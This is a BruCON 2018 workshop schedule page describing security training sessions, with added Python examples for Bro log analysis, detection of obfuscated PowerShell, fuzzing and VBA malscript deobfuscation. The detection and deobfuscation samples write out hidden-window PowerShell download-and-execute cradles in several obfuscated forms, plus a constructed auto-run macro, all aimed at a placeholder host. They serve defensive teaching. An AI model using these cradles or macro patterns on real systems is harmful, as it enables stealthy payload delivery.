BruCON 0x0A has ended


Workshop
Thursday, October 4
 

10:30

Introduction to Bro Network Security Monitor
Limited Capacity filling up

Bro (renamed Zeek in late 2018) is an open-source Network Security Monitor (NSM) and analytics platform. Although it has existed since the mid-1990s, its user base was long confined to universities, research labs and supercomputing centers. In the past few years, however, more and more security professionals in industry have turned their attention to this powerful tool: it runs on commodity hardware and so provides a low-cost alternative to commercial solutions.

At its core, Bro inspects traffic and writes an extensive set of well-structured, tab-separated log files that record a network's activity. Bro is nonetheless much more than a traditional signature-based IDS. While it supports that standard functionality as well, Bro's scripting language lets security analysts perform arbitrary analysis tasks: extracting files from sessions, detecting malware by querying an external source, detecting brute-forcing, and so on. Like Python, it ships with a large set of pre-built standard libraries.

During this two-hour workshop, we will learn about Bro's capabilities and cover the following topics: 
- Introduction to Bro 
- Bro architecture 
- Bro events and logs 
- Bro signatures 
- Bro scripting 
- Bro and ELK 
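As an added illustration of the "events and logs" and brute-force items above (example code written for this page, not material from the workshop or from Bro itself), the following Python reads Bro's tab-separated log format by honouring its header lines (#separator, #unset_field, #fields) and then flags SSH password guessing the way Bro's own SSH password-guessing policy script does, only offline over the log. The ssh.log excerpt is constructed and keeps a reduced set of the columns a real ssh.log carries; the threshold and window are arbitrary.

```python
"""Parse Bro's tab-separated logs and flag SSH brute forcing.

Added example, not material from the workshop. The ssh.log excerpt is
constructed and keeps only a subset of the columns a real Bro ssh.log has,
but it follows the real header layout (#separator, #fields, #types, ...).
"""
from collections import defaultdict

# Constructed ssh.log excerpt. The first header line is space-delimited and
# carries the separator as an escape sequence; every later line is tab-delimited.
SAMPLE_SSH_LOG = (
    "#separator \\x09\n"
    "#set_separator\t,\n"
    "#empty_field\t(empty)\n"
    "#unset_field\t-\n"
    "#path\tssh\n"
    "#open\t2018-10-04-10-30-00\n"
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tauth_success\tauth_attempts\n"
    "#types\ttime\tstring\taddr\tport\taddr\tport\tbool\tcount\n"
    "1538649000.100000\tCkq1\t10.0.0.7\t51001\t192.168.1.20\t22\tF\t3\n"
    "1538649005.000000\tCkq2\t10.0.0.9\t40222\t192.168.1.20\t22\tF\t1\n"
    "1538649010.200000\tCkq3\t10.0.0.7\t51002\t192.168.1.20\t22\tF\t3\n"
    "1538649012.000000\tCkq4\t10.0.0.9\t40223\t192.168.1.20\t22\tT\t1\n"
    "1538649018.000000\tCkq5\t10.0.0.7\t51003\t192.168.1.20\t22\tF\t3\n"
    "1538649025.500000\tCkq6\t10.0.0.7\t51004\t192.168.1.20\t22\tF\t3\n"
    "1538649030.000000\tCkq7\t10.0.0.11\t33000\t192.168.1.20\t22\t-\t-\n"
    "1538649033.300000\tCkq8\t10.0.0.7\t51005\t192.168.1.20\t22\tF\t3\n"
    "1538649041.900000\tCkq9\t10.0.0.7\t51006\t192.168.1.20\t22\tF\t3\n"
    "#close\t2018-10-04-10-35-00\n"
)


def parse_bro_log(text):
    """Return one dict per record, keyed by the names in the #fields header.

    Unset values ('-' unless #unset_field says otherwise) become None."""
    sep, unset, fields, records = "\t", "-", None, []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#separator "):
            # e.g. '#separator \x09' -> the literal escape sequence, decode it
            sep = line.split(" ", 1)[1].encode("ascii").decode("unicode_escape")
            continue
        if line.startswith("#"):
            key, _, value = line[1:].partition(sep)
            if key == "fields":
                fields = value.split(sep)
            elif key == "unset_field":
                unset = value
            continue  # #set_separator, #types, #open, #close carry no records
        if fields is None:
            raise ValueError("data line before #fields header")
        values = line.split(sep)
        records.append({name: (None if v == unset else v) for name, v in zip(fields, values)})
    return records


def detect_ssh_bruteforce(records, threshold=5, window=60.0):
    """Return {source: failures} for sources with >= threshold failed SSH
    logins inside any `window`-second span (a sliding window over ts)."""
    failures = defaultdict(list)
    for rec in records:
        if rec.get("auth_success") == "F":  # '-' (unset) means no verdict, so skip it
            failures[rec["id.orig_h"]].append(float(rec["ts"]))
    alerts = {}
    for src, times in failures.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    recs = parse_bro_log(SAMPLE_SSH_LOG)
    print(len(recs), "records;", "alerts:", detect_ssh_bruteforce(recs))
```

Two details matter when you do this on real logs: read the column names from #fields rather than hard-coding positions, because the column set changes between Bro versions and with loaded scripts, and treat the unset marker as "no verdict" rather than as a failure, otherwise every connection that ended before authentication inflates the count.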

Speakers
Eva Szilagyi

CEO, Alzette Information Security
Eva Szilagyi is managing partner and CEO of Alzette Information Security, a consulting company based in Luxembourg. She has more than 8 years of professional experience in penetration testing, security source code review, digital forensics, IT auditing, telecommunication networks...
David Szili

CTO, Alzette Information Security
David Szili is managing partner and CTO of Alzette Information Security, a consulting company based in Luxembourg. He has more than 8 years of professional experience in penetration testing, red teaming, vulnerability assessment, vulnerability management, security monitoring, security...


Thursday October 4, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Python Toolsmithing 101
Limited Capacity full

In this 2-hour workshop, attendees will learn how to create (security) tools in Python. With more than 30 years' experience developing tools, 12 years of publishing them, more than 100 tools released and at least a couple widely used by the security community, Didier Stevens will share his knowledge and teach attendees how to develop their own tools in Python.

To get a major boost when attendees start developing their first tool, Didier will share his private templates for the development of tools and explain all the features and how to develop with these templates. These private templates will become public after this workshop.

These templates are actually used by Didier to develop and publish new tools.

One template is for binary files. This template can not only read and process binary files, but also binary files stored in compressed files, binary files provided via stdin, generated files, here-documents, … Output can be generated in different formats: binary, hexadecimal, ASCII/Hexadecimal, custom, …

Another template is for text files. Like the binary file template, this template too has several input methods and output methods.

Attendees will learn about features that are common across Didier Stevens’ tools, and that they can use in their own tools developed with the templates.

After completing several exercises to get familiar with Python toolsmithing and Didier’s templates, 2 new tools (one binary tool and one text tool) will be developed by the attendees under Didier’s guidance.

After the workshop, attendees will have enough knowledge to get started as a Python toolsmith. Depending on the complexity of the tools they want to create, a new tool can be as simple as programming one new Python function, thanks to the features provided by the template.

Speakers
Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You...


Thursday October 4, 2018 10:30 - 12:30
04. Orval Novotel

10:30

Simplifying the art of instrumentation
Limited Capacity full

1. Source instrumentation & Binary instrumentation

2. Static
    a. Compile time instrumentation
        i. LLVM
        ii. AFL instrumentation use case
    b. Binary rewriting

3. Dynamic instrumentation
    a. Introduction
    b. Intel Pin
    c. DynamoRIO
    d. Dyninst

4. Application of instrumentation in the domain of security:
    a. Coverage tracing
    b. Aiding reverse engineering
    c. Vulnerability discovery
    d. Malware analysis
    e. Taint analysis
    f. Debugging
    g. Data flow analysis
    h. Control flow analysis

Speakers
Rushikesh D. Nandedkar

Rushikesh is a security analyst. With more than six years of experience under his belt, his assignments have always been pointed towards reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014, BruCON...

Krishnakant B. Patil

Krishnakant is a vulnerability researcher by profession. Yet he is best known among security researchers for his cutting-edge capabilities and skills in reverse engineering, exploit development and malware analysis. He has successfully conducted many workshops and hands-on...


Thursday October 4, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore! (Short Version)
Limited Capacity filling up

The cyber attack landscape has changed. Malicious adversaries continue to refine the techniques they use to exploit enterprise networks, and what our analysts lack is a better way to hunt for adversarial presence. The purpose of this talk is to show how to engineer a brand new Cyber Threat Intelligence Detection System (CTDS) and to release two new frameworks, Excalibur TIE Mark I and Themis Network Analyzer, that give investigators a better way to hunt for new threats in real time. This technical talk dives straight in to show how to engineer the intelligence engine and create autonomous network sensors that extract and analyze thousands of artifacts, both from each host and directly from the enterprise network. The system derives real indicators of compromise (IOCs) from large data sets and then applies those IOCs to better protect the enterprise network from new attacks.

Novel approaches are presented, together with the algorithms used to analyze, correlate and produce IOCs, allowing the investigator to hunt for new threats more effectively, populate uniform data sets suited to dissemination and analysis, and create new visualization graphs that help analysts derive meaning from vast amounts of aggregated data. Finally, the talk applies everything covered and shows how to create new distributed network sensors and deploy the IOCs discovered by the Threat Intelligence Engine to better protect the enterprise network. Rest assured, lots of live demos are included. And of course, this talk comes with a new open-source tool release for the community to use!

Attacks of tomorrow will no longer be as effective if we have the right tools to hunt for the adversary. This involves a new way of thinking. Threat intelligence will be the next paradigm in computer security. Allow me to show you how to engineer the entire framework and deploy it on your network.

Speakers
Solomon Sonya

Solomon Sonya (@Carpenter1010) is an Assistant Professor of Computer Science at the United States Air Force Academy. He has a background in software development, malware analysis, covert channels, steganography, distributed computing, computer hacking, information protection paradigms...


Thursday October 4, 2018 10:30 - 12:30
06. Rochefort Novotel

13:30

Python Toolsmithing 101
Limited Capacity filling up

Repeat of the 10:30 Python Toolsmithing 101 workshop; the description and speaker bio above apply.

Speakers

Didier Stevens


Thursday October 4, 2018 13:30 - 15:30
06. Rochefort Novotel

13:30

Developing Resilient Detections (with Obfuscation & Evasion in Mind)
Limited Capacity full

WARNING: Heavy obfuscation, evasion and general offensive techniques will be demonstrated to challenge and improve attendees’ defensive thinking and detection approaches!

Offensive tradecraft and "living off the land" techniques are discovered, developed and released to the public at breakneck speed. Attackers begin using these techniques within hours of their release. Defenders, however, often spend days, weeks or months identifying them and reactively creating signatures. These reactive signatures are often overly rigid, so they are easily bypassed by simple modifications to the command or technique.

In this workshop we will:
    * Develop multiple layers of resilient host-based and network-based detections for several relevant "living off the land" attack techniques
    * Introduce incremental layers of obfuscation and evasion techniques to the attacker commands and payloads to iteratively evade and harden our detection approach
    * Learn about numerous host-based artifacts we can use for detection purposes (process arguments, common persistence locations, image load events, prefetch files, Shimcache, Amcache, SRUM - System Resource Usage Monitor, etc.)
    * Implement detection logic in numerous formats including IOCs (Indicators of Compromise), YARA rules, and Snort signatures

The author has several years of real-world experience creating, tuning and enriching real-time detections that run on 10+ million endpoints in hundreds of environments around the world. This first-hand experience will help facilitate conversations around false positives, detection performance and signal-to-noise ratios, concepts that are often overlooked (and sometimes less relevant) when dealing only with smaller environments.
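As an added example of the rigid-versus-resilient point above (example code written for this page, not the workshop's material or its rules), the Python below puts a signature written straight from one observed sample next to a detector that first undoes the cheap obfuscation layers and then matches on behaviour. The process command lines are constructed; the host example.test is a placeholder; the rigid regex and the indicator set are illustrative, not production rules. The layers it undoes are ones the page names or that are standard: cmd.exe caret escapes, PowerShell backtick escapes, string concatenation of method names, case changes, and -EncodedCommand (base64 of UTF-16LE, accepted under abbreviations such as -e, -ec and -enc because powershell.exe accepts unambiguous parameter prefixes).

```python
"""Rigid signature vs. normalising detector for a PowerShell download cradle.

Added example; it is not the workshop's material. The command lines are
constructed, and both detectors are illustrative rather than production rules.
"""
import base64
import re


def encode_command(script: str) -> str:
    """Build what powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"

# Constructed process-creation command lines (example.test is a placeholder host).
SAMPLES = {
    "plain":   'powershell.exe -nop -w hidden -c "' + CRADLE + '"',
    "caret":   'cmd.exe /c p^ow^ershell -NoP -W hidden -c "' + CRADLE + '"',
    "tick":    "PoWeRsHeLl -nop -w hidden -c \"I`EX (New-Object Net.WebClient).DoWn`loadString('http://example.test/a')\"",
    "concat":  "powershell -w hidden -c \"IEX (New-Object ('Net.'+'WebClient')).('Download'+'String').Invoke('http://example.test/a')\"",
    "encoded": "powershell -nop -w hidden -ec " + encode_command(CRADLE),
    "benign":  "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
}

# A rigid signature of the kind written straight from one observed sample.
RIGID = re.compile(r"powershell\.exe.*DownloadString")


def detect_rigid(cmdline: str) -> bool:
    return bool(RIGID.search(cmdline))


_CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")   # 'Down'+'load' -> 'Download'
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
_ENC_ARG = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def normalize(cmdline: str, depth: int = 0) -> str:
    """Undo the cheap obfuscation layers and fold any encoded payload in."""
    s = _CONCAT.sub("", cmdline)
    s = s.replace("^", "").replace("`", "")     # cmd.exe caret and PowerShell backtick escapes
    decoded = []
    if depth < 3:                               # bounded: encoded commands nested in encoded commands
        for m in _ENC_ARG.finditer(s):
            try:
                plain = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
            except ValueError:                  # binascii.Error and UnicodeDecodeError both qualify
                continue
            decoded.append(normalize(plain, depth + 1))
    s = re.sub(r"""['"]""", "", s)              # leftover quotes carry no meaning for matching
    s = " ".join(s.lower().split())             # case-fold, collapse whitespace
    return " ".join([s] + decoded)


# Behaviour-level indicators, matched on the normalised text.
INDICATORS = {
    "download": re.compile(r"downloadstring|downloadfile|downloaddata|net\.webclient|invoke-webrequest"),
    "execute":  re.compile(r"invoke-expression|\biex\b"),
    "hidden":   re.compile(r"-w\w*\s+hidden"),  # -w / -win / -WindowStyle hidden
    "encoded":  re.compile(r"-e(?:c|n\w*)?\s+[a-z0-9+/=]{8,}"),
}


def detect_resilient(cmdline: str) -> dict:
    text = normalize(cmdline)
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    # Alert on the behaviour (fetch plus execute), not on one spelling of it.
    return {"hits": hits, "cradle": "download" in hits and "execute" in hits}


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(f"{label:8} rigid={detect_rigid(cmd)!s:5} resilient={detect_resilient(cmd)}")
```

The rigid regex fires on the first sample only; the normalising detector fires on all five variants of the cradle and stays quiet on the benign script run. Normalisation is itself a target (format-operator tricks, [char] arithmetic and string reordering survive it), which is why the list above layers host artifacts such as image loads and parent-process context on top of command-line matching rather than relying on either alone.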

Speakers
Daniel Bohannon

Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye's Advanced Practices Team, where they research attacker activity and develop effective detection signatures and processes (among other things). Matthew previously...


Thursday October 4, 2018 13:30 - 17:30
03. Chimay Novotel

13:30

Finding security vulnerabilities with modern fuzzing techniques
Limited Capacity full

Fuzzing is a very powerful technique for detecting flaws and vulnerabilities in software. The aim of this hands-on workshop is to demonstrate different techniques that can be used to fuzz applications or libraries. Choosing the correct and most effective fuzzing technique is discussed with real-world examples, and hints on common problems and pitfalls during fuzzing are given. After discussing the theory behind modern fuzzing techniques we look at well-known fuzzers and how they can be used to find real-world vulnerabilities. The second part covers the important factors that influence fuzzing results. We also discuss the differences between fuzzing open-source and closed-source applications, and the reverse engineering techniques that assist the fuzzing process.
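The following is an added example (written for this page, not material from this workshop or from the instrumentation workshop above) that ties the two together: coverage tracing from the instrumentation outline, used as the feedback signal of a mutational fuzzer. The target parse_record is a constructed, deliberately buggy binary parser; the edge coverage that AFL obtains from LLVM compile-time instrumentation, and that Pin or DynamoRIO obtain at run time, is collected here with Python's sys.settrace hook, which is enough to show the mechanism. The mutation operators, seed, iteration budget and the parser's format are all assumptions of the example.

```python
"""Coverage-guided mutational fuzzing, with sys.settrace as the instrumentation.

Added example, not from either workshop. parse_record is a constructed,
deliberately buggy target; the (prev_line, line) edge coverage that AFL gets
from compile-time instrumentation is collected here with Python's trace hook.
"""
import random
import sys


def parse_record(data: bytes) -> int:
    """Constructed target: 'BR' magic, version 1, field count, then
    (type, length, payload) fields. A type-0x10 field is read without a
    bounds check; the IndexError stands in for the out-of-bounds read a C
    parser would have. ValueError is the parser's normal rejection."""
    if len(data) < 4:
        raise ValueError("too short")
    if data[:2] != b"BR":
        raise ValueError("bad magic")
    if data[2] != 1:
        raise ValueError("unsupported version")
    pos, total = 4, 0
    for _ in range(data[3]):
        if pos + 2 > len(data):
            raise ValueError("truncated field header")
        ftype, flen = data[pos], data[pos + 1]
        pos += 2
        if ftype == 0x10:
            for i in range(flen):           # BUG: flen is never checked against len(data)
                total ^= data[pos + i]
        elif pos + flen > len(data):
            raise ValueError("truncated field body")
        else:
            total += sum(data[pos:pos + flen])
        pos += flen
    return total


def run_with_coverage(target, data):
    """Run target(data); return (set of (prev_line, line) edges, exception or None)."""
    edges, state, code = set(), {"prev": 0}, target.__code__

    def line_tracer(frame, event, arg):
        if event == "line":
            edges.add((state["prev"], frame.f_lineno))
            state["prev"] = frame.f_lineno
        return line_tracer

    def call_tracer(frame, event, arg):     # instrument only the target's own frame
        return line_tracer if frame.f_code is code else None

    exc = None
    sys.settrace(call_tracer)
    try:
        target(data)
    except Exception as e:                  # the fuzzer classifies every exception
        exc = e
    finally:
        sys.settrace(None)
    return edges, exc


INTERESTING = (0x00, 0x01, 0x7F, 0x80, 0xFF)


def mutate(data, rng, max_len=64):
    """Stack one to three byte-level mutations (an AFL-style havoc stage)."""
    buf = bytearray(data)
    for _ in range(rng.randint(1, 3)):
        op = rng.randrange(4)
        if op == 0 and buf:                                   # flip a bit
            buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
        elif op == 1 and buf:                                 # overwrite a byte
            buf[rng.randrange(len(buf))] = rng.choice(INTERESTING) if rng.random() < 0.5 else rng.randrange(256)
        elif op == 2 and len(buf) < max_len:                  # insert a byte
            buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
        elif op == 3 and len(buf) > 1:                        # delete a byte
            del buf[rng.randrange(len(buf))]
    return bytes(buf)


def fuzz(target, seeds, iterations=10000, seed=1, expected=(ValueError,)):
    """Return (crashing_input, exception, corpus). An input that reaches a new
    edge joins the corpus and is mutated further; any exception outside
    `expected` counts as a crash."""
    rng, corpus, seen = random.Random(seed), [], set()
    for s in seeds:
        seen |= run_with_coverage(target, s)[0]
        corpus.append(s)
    for _ in range(iterations):
        candidate = mutate(rng.choice(corpus), rng)
        edges, exc = run_with_coverage(target, candidate)
        if exc is not None and not isinstance(exc, expected):
            return candidate, exc, corpus
        if edges - seen:
            seen |= edges
            corpus.append(candidate)
    return None, None, corpus


if __name__ == "__main__":
    crash, exc, corpus = fuzz(parse_record, [b"BR\x01\x01\x00\x00"])
    print(f"corpus={len(corpus)} crash={crash!r} exc={exc!r}")
```

The corpus grows each time a mutant reaches an edge nobody has reached before (a valid field, then a type-0x10 field, then one that runs past the buffer), which is exactly the feedback loop that lets a coverage-guided fuzzer pass the magic and version checks instead of spending its budget on inputs the first line rejects. Distinguishing the parser's expected rejections from real crashes is the part that most often goes wrong in practice; in C the equivalent is pairing the fuzzer with a sanitizer so that the out-of-bounds read is reported instead of silently returning garbage.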

Speakers
Rene Freingruber

Senior Security Consultant, SEC Consult
René Freingruber has been working as a professional security consultant for SEC Consult for several years. He conducts research in the fields of malware analysis, reverse engineering, fuzzing and exploit development. For his bachelor thesis he studied modern mitigation techniques...


Thursday October 4, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

Malware Triage: Analyzing Malscripts – Return of The Exploits!
Limited Capacity full

In recent years malscripts and file-based exploits have become a main delivery method for malware. Malscripts are often heavily obfuscated and can take many forms, including WScript, JavaScript, macros and PowerShell. There has also been a rise in document-based exploits used to deliver and execute these malscripts. As a result, incident responders and malware analysts need to be comfortable analyzing different document formats, identifying potential exploits and analyzing malscripts.

In this workshop you will work through the triage of a live malware delivery chain that includes a malicious document, malicious scripts and a final malware payload. During this process you will be exposed to different document-based exploits, and you will practice the skills required to manually analyze malscripts. This workshop focuses on the fundamental analysis techniques used when identifying, deobfuscating and analyzing maldocs and malscripts. However, we will also provide an introduction to automation tools and techniques that can be used to speed up the analysis process.

This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who are interested in learning more about the malware triage process. If you have no experience with malware analysis but have a good understanding of scripting languages like VBScript and JavaScript, and are familiar with Windows internals, you should have no problem completing the workshop.

You will be provided with a virtual machine to use during the workshop, so please bring a laptop that meets the following requirements: VirtualBox installed and working (VMware is not supported); at least 60 GB of free disk space, preferably 100 GB; and the ability to mount USB storage devices (bring the appropriate dongle if you need one).
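As an added example of the manual deobfuscation step this workshop describes (code written for this page, not the workshop's material), the Python below statically simplifies a constructed VBA-style macro that assembles a command line from Chr(), StrReverse(), Replace() and string concatenation, the patterns hand triage meets constantly. It rewrites those expressions to a fixed point and tracks string variables built up across assignments; it does not emulate control flow, and the regex rules, the sample macro and the placeholder host example.test are all assumptions of the example.

```python
"""Static deobfuscation of a VBA-style malscript by iterative simplification.

Added example, not the workshop's own tooling. The macro below is constructed;
it builds a command line from Chr(), StrReverse(), Replace() and concatenation,
which are the only patterns this simplifier understands.
"""
import re

SAMPLE_MACRO = '''Sub AutoOpen()
    Dim s As String
    s = Chr(112) & Chr(111) & "wer" & StrReverse("llehs")
    s = s & Replace(" -n@@op -w hid@@den -c ", "@@", "")
    s = s & Chr(34) & "IEX (New-Object Net.WebClient)." & StrReverse(")'x/tset.elpmaxe//:ptth'(gnirtSdaolnwoD") & Chr(34)
    CreateObject("WScript.Shell").Run s, 0
End Sub
'''

LIT = r'"(?:[^"]|"")*"'               # VBA string literal; a doubled quote is an escaped quote
_LIT_RE = re.compile(LIT)
_ASSIGN = re.compile(r"^(\s*)(\w+)\s*=\s*(.+?)\s*$")   # naive: would also match 'If a = b Then'


def _unquote(lit: str) -> str:
    return lit[1:-1].replace('""', '"')


def _quote(s: str) -> str:
    return '"' + s.replace('"', '""') + '"'


_RULES = [
    # Chr(n) -> "c"
    (re.compile(r"\bChr\((\d+)\)"), lambda m: _quote(chr(int(m.group(1))))),
    # StrReverse("lit") -> reversed literal
    (re.compile(r"\bStrReverse\((" + LIT + r")\)"), lambda m: _quote(_unquote(m.group(1))[::-1])),
    # Replace("lit", "find", "repl") -> rewritten literal
    (re.compile(r"\bReplace\((" + LIT + r"),\s*(" + LIT + r"),\s*(" + LIT + r")\)"),
     lambda m: _quote(_unquote(m.group(1)).replace(_unquote(m.group(2)), _unquote(m.group(3))))),
    # "a" & "b"  (or "a" + "b")  -> "ab"
    (re.compile(r"(" + LIT + r")\s*[&+]\s*(" + LIT + r")"),
     lambda m: _quote(_unquote(m.group(1)) + _unquote(m.group(2)))),
]


def simplify(expr: str) -> str:
    """Apply the rewrite rules until the expression stops changing."""
    prev = None
    while prev != expr:
        prev = expr
        for pat, fn in _RULES:
            expr = pat.sub(fn, expr)
    return expr


def _substitute(expr: str, env: dict) -> str:
    """Replace known variables by their literal values, outside string literals only."""
    parts = re.split("(" + LIT + ")", expr)   # even indices are code, odd indices are literals
    for i in range(0, len(parts), 2):
        for name, value in env.items():
            parts[i] = re.sub(r"\b" + re.escape(name) + r"\b", lambda _m, v=value: _quote(v), parts[i])
    return "".join(parts)


def deobfuscate(script: str):
    """Walk the script once, tracking string variables built up by assignment.

    Returns (rewritten script, final variable values). Loops and branches are
    not emulated; that is where a full VBA emulator takes over."""
    env, out = {}, []
    for line in script.splitlines():
        m = _ASSIGN.match(line)
        if m:
            indent, name, rhs = m.groups()
            rhs = simplify(_substitute(rhs, env))
            if _LIT_RE.fullmatch(rhs):        # fully resolved: remember it for later lines
                env[name] = _unquote(rhs)
            out.append(f"{indent}{name} = {rhs}")
        else:
            out.append(simplify(_substitute(line, env)))
    return "\n".join(out), env


if __name__ == "__main__":
    rewritten, final = deobfuscate(SAMPLE_MACRO)
    print(rewritten)
    print("resolved:", final)
```

The rewritten script shows the Run call with its argument resolved to a PowerShell download cradle, which is the triage outcome that matters: the URL and the execution method, obtained without running the macro. Regex rules of this kind are deliberately narrow (the Chr rule would also fire on the text "Chr(1)" inside a string literal, and the assignment pattern does not understand If or For), so treat this as the quick first pass before reaching for a proper emulator on anything it cannot reduce.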

Speakers
Sergei Frankoff

Twitter: @herrcore YouTube: https://www.youtube.com/oalabs Sergei is a co-founder of Open Analysis, and volunteers as a malware researcher. When he is not reverse engineering malware Sergei is focused on building automation tools for malware analysis. Sergei is a strong believer...

Sean Wilson

Twitter: @seanmw YouTube: https://www.youtube.com/oalabs Sean is a co-founder of Open Analysis, and volunteers as a malware researcher. He splits his time between reverse engineering malware and building automation tools for incident response. He is an active contributor to open...


Thursday October 4, 2018 13:30 - 17:30
04. Orval Novotel

15:45

A goldmine within an ocean of data – basics of network forensics
Limited Capacity full

/!\ Important Notice /!\

For The workshop, the participants are requested to download the SOF-ELK Virtual Machine.
You can find the VM at the following address:  https://github.com/philhagen/sof-elk/blob/master/VM_README.md

Please have the VM ready to use for the workshop.
Thank you!
-------------------------------------------------------------------------------------------------------------------------------------

Loads of data pass over a corporate network, and finding useful things in this stream can be overwhelming. This workshop gives a brief introduction to capturing this data, then turns to its main focus: handling the huge volume of data with mostly Free and Open Source Software. To finish, we tackle automating the process.

Speakers
Andy Deweirt

I'm a security consultant with over 10 years of experience in infosecurity. I've built firewalls, architected solutions, tested security, broken infrastructure and built SOC capabilities. A main thread within the multiple roles and assignments has mostly been network security. As...


Thursday October 4, 2018 15:45 - 17:45
06. Rochefort Novotel
 
Friday, October 5
 

10:30

A goldmine within an ocean of data – basics of network forensics
Limited Capacity filling up

Repeat of the Thursday 15:45 workshop; the notice, description and speaker bio above apply. Have the SOF-ELK virtual machine ready to use.

Speakers

Andy Deweirt


Friday October 5, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Finding security vulnerabilities with modern fuzzing techniques (Short Version)
Limited Capacity full

Shorter, two-hour version of the Thursday 13:30 workshop; the description and speaker bio above apply.

Speakers

Rene Freingruber


Friday October 5, 2018 10:30 - 12:30
06. Rochefort Novotel

10:30

ICS Forensic Workshop
Limited Capacity filling up

You are an incident responder at a nuclear waste management facility. An incident has taken place in the industrial environment: a number of valves on the main waste storage tank are sporadically opening and closing. The valves are controlled by a PLC, and the local security operations centre (SOC) suspects an attack against the PLC. You are given a network pcap file and a dump of the PLC's data blocks for analysis, and are expected to determine what occurred and how the valve behaviour was modified.

Speakers
Joe Stirland

Joe Stirland is a senior scientist and technical Lead for the Airbus DTO – ZSCA Cyber Forensics lab and is responsible for state of the art research within the cyber forensics field in support of Airbus (Airbus, Airbus Helicopters, Airbus Defence & Space, and Airbus HQ). He holds...


Friday October 5, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

Jedi tricks to convince your boss (Episode 2)
Limited Capacity filling up

The 2017 Global Information Security Workforce Study showed that communication skills are the competence most sought by hiring managers (66% of them), while only 25% of security professionals put these skills on their development track.
Today, in most organizations, it is unlikely you will be able to improve your company's security if you cannot convince people to move in the right direction. Assertiveness

Speakers
Emmanuel Nicaise

Emmanuel Nicaise has 25 years of experience in IT amongst which about 19 in security. With a degree in IT and a master's in clinical psychology, he's naturally focusing on human-centric security management and on the different ways to foster a better security culture in organizations...


Friday October 5, 2018 10:30 - 12:30
04. Orval Novotel

13:30

The story of greendale
Limited Capacity filling up

Ever wanted to do forensics and feel good about it? This workshop introduces a suite of open-source tools for all things digital forensics and incident response. You will see how Greendale (a fictitious but very famous university) used these tools to mount an effective response to a pretty severe incident last summer, all on a state-financed university budget! We will cover collection of forensic evidence with GRR, processing with Plaso and analysis with Timesketch; how these tools can be chained together with dftimewolf; and how to image disks remotely and have the processing done in the cloud.

Speakers
Thomas Chopitea

Thomas is a forensics investigator and engineer at Google. He focuses on digital forensics, incident response, and building the bricks that make his team's investigation and response process as smooth and efficient as possible. His long-term professional goal is to automate himself...

Daniel White

Daniel White is a security engineer at Google and the tech lead for the Plaso project. He is focused on keeping people and data safe. He works on forensics, incident response and tool development.


Friday October 5, 2018 13:30 - 16:30
03. Chimay Novotel

13:30

Active Directory Redteaming : Attacking the backbone of Enterprise environments
Limited Capacity filling up

This workshop covers attacking an Active Directory environment using built-in tools like PowerShell and other Microsoft-signed binaries. Using the assume-breach methodology, we start as a normal user in the domain and silently work our way up to the highest privileges at the enterprise level.

We will focus on not touching disk, abusing functionality and evading detection mechanisms, while still achieving true domain dominance.

Speakers
Nikhil Mittal

Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes red teaming, active directory, attack research, defense strategies and post exploitation research. He has 9+ years of experience in red teaming. He specializes in assessing security...


Friday October 5, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore!
Limited Capacity filling up

Full-length version of the Thursday 10:30 session; the description and speaker bio above apply.

Speakers

Solomon Sonya


Friday October 5, 2018 13:30 - 17:30
04. Orval Novotel